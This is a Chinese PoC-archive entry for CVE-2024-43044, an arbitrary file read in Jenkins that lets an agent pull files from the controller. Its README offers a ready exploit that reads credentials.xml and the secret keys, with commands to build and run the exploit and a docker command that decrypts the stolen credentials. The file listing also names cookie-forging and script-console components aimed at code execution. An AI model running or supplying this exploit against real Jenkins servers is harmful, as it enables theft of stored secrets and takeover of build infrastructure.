POC详情: f743f38a3b1bef93d94a98fb69cf4dd8014718dd

来源
关联漏洞
标题: Jenkins 安全漏洞 (CVE-2024-43044)
描述:Jenkins是Jenkins开源的一个应用软件。一个开源自动化服务器Jenkins提供了数百个插件来支持构建,部署和自动化任何项目。 Jenkins 2.470及之前版本和Jenkins LTS 2.452.3及之前版本存在安全漏洞,该漏洞源于允许代理进程使用Remoting中的ClassLoaderProxy#fetchJar方法从Jenkins控制器文件系统读取任意文件。
介绍
## Intro
This is an exploit for CVE-2024-43044, an arbitrary file read that allows an agent to fetch files from the controller.

The exploit will use the vulnerability to read credentials.xml file and get secret keys to decrypt it.

Initial code : https://github.com/convisolabs/CVE-2024-43044-jenkins
Original writeup : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

## Building the exploit
```sh
mvn package
```

## Running the exploit

```sh
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
```

### Decrypt credentials.xml
```sh
docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json
```

## Testing 

You can test it in vulnerable version using docker:

```sh
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
```

Once you have a jenkins runnning, setup an agent.
文件快照

[4.0K] /data/pocs/f743f38a3b1bef93d94a98fb69cf4dd8014718dd ├── [4.0K] assets │   └── [2.9M] rce_mode_secret.gif ├── [3.2K] pom.xml ├── [1.2K] README.md └── [4.0K] src └── [4.0K] main └── [4.0K] java └── [4.0K] poc ├── [6.6K] CookieForger.java ├── [4.1K] FakeCookieForger.java ├── [5.6K] Main.java ├── [8.3K] PocListener.java ├── [1.2K] RemoteFileReader.java ├── [6.3K] ScriptConsole.java ├── [5.2K] SystemUtils.java ├── [ 516] UserInfo.java └── [4.3K] UserParser.java 5 directories, 12 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。